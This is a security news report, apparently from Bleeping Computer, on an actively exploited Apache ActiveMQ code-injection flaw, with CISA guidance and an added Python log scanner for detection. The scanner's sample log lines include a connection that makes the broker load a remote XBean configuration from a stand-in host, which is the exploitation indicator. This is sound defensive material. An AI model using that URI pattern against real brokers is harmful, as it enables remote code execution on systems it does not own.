Actively exploited Apache ActiveMQ flaw impacts 6,400 servers

Published: (April 21, 2026 at 07:17 AM EDT)

Source: Bleeping Computer

Overview

Nonprofit security organization Shadowserver identified more than 6,400 Apache ActiveMQ servers exposed online that are vulnerable to an actively exploited, high‑severity code‑injection flaw.

Apache ActiveMQ is a widely used open‑source, multi‑protocol message broker written in Java that carries asynchronous messages between applications.

Vulnerability Details

  • CVE‑2026‑34197 (tracked in the NVD).
  • Discovered by Horizon3 researcher Naveen Sunkavally using the Claude AI assistant.
  • The flaw stems from improper input validation and lets an authenticated attacker execute arbitrary code on an unpatched broker.

The Apache maintainers fixed the flaw on 30 March 2026 in ActiveMQ Classic 6.2.3 and 5.19.4; brokers on earlier releases of either line are unpatched and should be upgraded to those versions or later.

Impact

Shadowserver’s scans between 17 and 20 April 2026 found more than 6,400 unique IP addresses with ActiveMQ fingerprints exposed online, most of them in:

  • Asia: 2,925
  • North America: 1,409
  • Europe: 1,334

Unpatched ActiveMQ servers exposed online (Shadowserver)

CISA Advisory

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) flagged the vulnerability as actively exploited and ordered Federal Civilian Executive Branch (FCEB) agencies to secure their servers by 30 April 2026.

CISA’s statement emphasized the risk to the federal enterprise and urged agencies to:

  1. Apply vendor‑provided mitigations.
  2. Follow applicable BOD 22‑01 guidance for cloud services.
  3. Discontinue use of the product if mitigations are unavailable.

Recommendations for Administrators

Horizon3 researchers advise administrators to:

  • Search ActiveMQ broker logs for connections over the internal VM transport (vm://) whose URI carries a brokerConfig=xbean:http:// parameter, i.e. a connection that points the embedded broker at a remotely hosted XBean configuration.
  • Treat this issue as high priority, given ActiveMQ’s history as a repeated target of real‑world attackers and the well‑known exploitation and post‑exploitation tradecraft for it.

“We recommend organizations running ActiveMQ treat this as a high priority, as ActiveMQ has been a repeated target for real‑world attackers, and methods for exploitation and post‑exploitation of ActiveMQ are well‑known.” – Horizon3
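The log search Horizon3 recommends can be scripted. The scanner below is an added example, not code from Horizon3, Bleeping Computer or the ActiveMQ project: it pulls every vm:// URI out of each log line, URL‑decodes it (bounded, so percent‑ or double‑encoded parameters cannot slip past a plain substring match), and reports lines where brokerConfig=xbean: points at an http or https URL, together with the remote host for blocking and further hunting. The sample log lines are constructed, the pipe‑separated layout is an assumption modelled on ActiveMQ Classic’s default log4j pattern (adjust the regexes if your pattern differs), and the IP addresses are from documentation ranges.

```python
"""Scan ActiveMQ broker logs for VM-transport connections that load their
broker configuration from a remote XBean URL (brokerConfig=xbean:http(s)://)."""
import re
from urllib.parse import unquote, urlparse

# Constructed sample lines, not real broker output. The "|"-separated layout is an
# assumption modelled on ActiveMQ Classic's default log4j pattern; 203.0.113.0/24
# and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = """\
2026-04-18 10:01:12,455 | INFO | Connector openwire started | org.apache.activemq.broker.TransportConnector | main
2026-04-18 10:02:03,118 | INFO | Connector vm://localhost started | org.apache.activemq.broker.TransportConnector | main
2026-04-18 10:05:44,902 | INFO | Connector vm://localhost?brokerConfig=xbean:http://203.0.113.7:8000/evil.xml started | org.apache.activemq.broker.TransportConnector | ActiveMQ Transport: tcp:///198.51.100.23:51234@61616
2026-04-18 10:06:01,300 | INFO | Connector vm://localhost?brokerConfig=xbean%3Ahttps%3A%2F%2F203.0.113.7%2Fc.xml started | org.apache.activemq.broker.TransportConnector | ActiveMQ Transport: tcp:///198.51.100.23:51301@61616
2026-04-18 10:07:19,001 | INFO | Connector vm://localhost?brokerConfig=xbean:file:/opt/activemq/conf/activemq.xml started | org.apache.activemq.broker.TransportConnector | main
"""

# A vm:// URI runs until whitespace or the next log-field separator.
VM_URI = re.compile(r"vm://[^\s|]+", re.IGNORECASE)
# Only a *remote* XBean config is the indicator; xbean:file: is the documented local use.
REMOTE_XBEAN = re.compile(r"brokerConfig=xbean:(https?://[^&\s]+)", re.IGNORECASE)


def _decode(value, max_rounds=3):
    """URL-decode repeatedly (bounded) so percent- or double-encoded parameter
    values cannot evade the match."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_remote_xbean_connections(log_text):
    """Return one dict per log line whose vm:// URI loads its broker config
    from an http/https URL: {"line", "uri", "config_url", "host"}."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        for m in VM_URI.finditer(line):
            uri = _decode(m.group(0))
            x = REMOTE_XBEAN.search(uri)
            if x:
                config_url = x.group(1)
                hits.append({
                    "line": n,
                    "uri": uri,
                    "config_url": config_url,
                    "host": urlparse(config_url).hostname,
                })
    return hits


def remote_config_hosts(log_text):
    """Distinct hosts serving remote XBean configs: a starting point for blocking
    and for hunting the same host in proxy and DNS logs."""
    return sorted({h["host"] for h in find_remote_xbean_connections(log_text)})


if __name__ == "__main__":
    for hit in find_remote_xbean_connections(SAMPLE_LOG):
        print(f"line {hit['line']}: remote broker config {hit['config_url']}")
    print("hosts to block/hunt:", remote_config_hosts(SAMPLE_LOG))
```

Run it against the broker’s activemq.log (and any rotated copies) rather than the sample; a hit does not by itself prove the attacker succeeded, but the remote host is worth checking in proxy and DNS logs for the same period.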

CISA has also tagged two additional ActiveMQ CVEs as exploited in the wild:

  • CVE‑2016‑3088
  • CVE‑2023‑46604, exploited by the TellYouThePass ransomware gang.

For further details, refer to the linked sources and apply the recommended mitigations promptly.
